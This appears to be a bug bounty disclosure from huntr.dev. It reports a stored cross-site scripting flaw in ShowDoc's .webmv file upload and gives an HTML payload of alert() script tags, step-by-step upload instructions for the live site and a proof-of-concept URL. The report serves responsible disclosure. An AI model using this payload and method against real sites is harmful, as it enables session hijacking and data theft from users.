Lucene search

K
huntrSampritdas8DBE39998-8EB7-46EA-997F-7B27F6F16EA0
HistoryMar 14, 2022 - 2:47 p.m.

Stored XSS viva .webmv file upload

2022-03-1414:47:01
sampritdas8
www.huntr.dev
17
stored xss
webmv file
file upload
malicious scripts
session hijacking
sensitive data exposure
bug bounty

EPSS

0.001

Percentile

21.4%

Description

The application allows .webmv files to upload which lead to stored XSS

Proof of Concept

1.First, open your text file/notepad and paste the below payload and save it as XSS.webmv:

<html>

<script>alert(1337)</script>

<script>alert(document.domain)</script>

<script>alert(document.location)</script>

<script>alert(‘XSS_by_Samprit Das’)</script>

</html>

2.Then go to https://www.showdoc.com.cn/ and login with your account.

3.After that navigate to file library (https://www.showdoc.com.cn/attachment/index)

4.In the File Library page, click the Upload button and choose the XSS.webmv

5.After uploading the file, click on the check button to open that file in a new tab.

PoC URL

https://img.showdoc.cc/622f4ea2e82e9_622f4ea2e82e2.webmv?e=1647272721&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:WZQWcl9TWatpZGaHXf2Mnf6pEI8=

Impact

This allows attackers to execute malicious scripts in the user’s browser and it can lead to session hijacking, sensitive data exposure, and worse.

EPSS

0.001

Percentile

21.4%

Related for DBE39998-8EB7-46EA-997F-7B27F6F16EA0